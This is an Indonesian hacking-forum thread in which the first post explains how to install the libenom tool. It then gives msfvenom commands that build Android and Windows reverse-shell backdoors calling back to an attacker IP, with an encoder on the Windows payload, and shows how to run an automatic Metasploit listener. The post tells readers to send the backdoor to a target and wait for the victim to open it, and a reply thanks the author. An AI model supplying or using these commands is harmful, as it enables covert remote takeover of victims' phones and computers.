[Share] Run Automatic Listener Msfconsole With Libenom
#1
sore gaan kali ini ane mau share dikit tentang msfconsole dan pastinya broudah pada tau apa itu msfconsole ("pengguna baru? google Tongue ").
so ane share mengenai listenernya biasanyakan bikin listener mesti bikin commandnya dulu Nah, kali ini ane share bikin listenernya berjalan secara otomatis pakek libenom.
lalu apa itu libenom ? Libenom adalah alat yang diciptakan untuk membuat lebih mudah dan cepat penciptaan muatan dengan MSFvenom dan mendapatkan semua data yang dihasilkan.

Installasion :

Code:
git clone https://github.com/bounteous/libenom.git
cd libenom
chmod +x libenom.py

buka libenom dengan command ./libenom (jika memerlukan root tambah sudo ./libenom
ciptakan dulu sebuah profile dengan command sudo ./libenom -c contohprofile lalu enter setelah selesai bikin payloads dengan msfvenom.

for android :
Code:
-p android/meterpreter/reverse_tcp LHOST=ipanda LPORT=4444 R > libenom.apk

for windows :
Code:
-a x86 --platform windows -p windows/shell/reverse_tcp LHOST=192.168.43.76 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -f exe -o libenom.exe

lanjut eksekusi profile yang telah di buat tadi sudo ./libenom -x contohprofile tunggu hingga payloads selesai seperti gambar dibawah ini :

[Image: libenomsuccses.png]

sampai disini backdoor tersimpan di libenom/uotputfile setelah itu ente tinggal kirim kan backdoor ke target. lanjut membuat listenernya dengan command sudo ./libenom -l windows masukan ip dan port sesuai dengan backdoor tadi enter tunggu hingga korban membuka backdoor kira2 seperti gambar di bawah ini :

[Image: libenomexploit.png]

sampai sini listener berjalan secara otomatis jadi ngga perlu ketik command line lagi di msfconsole, ada banyak opsi listener yg bisa di gunakan selain windows ada android, osx dll lebih lengkap cek sudo ./libenom -l show.  jika belum vaham tonton video tutorialnya dibawah.


sekian semoga bermanfaat. source : here

#2
nah ini nih yang ane cari thanks
IBT REGIONAL LAMPUNG TELAH MATI TAPI ORANGNYA MASIH HIDUP






Users browsing this thread: 1 Guest(s)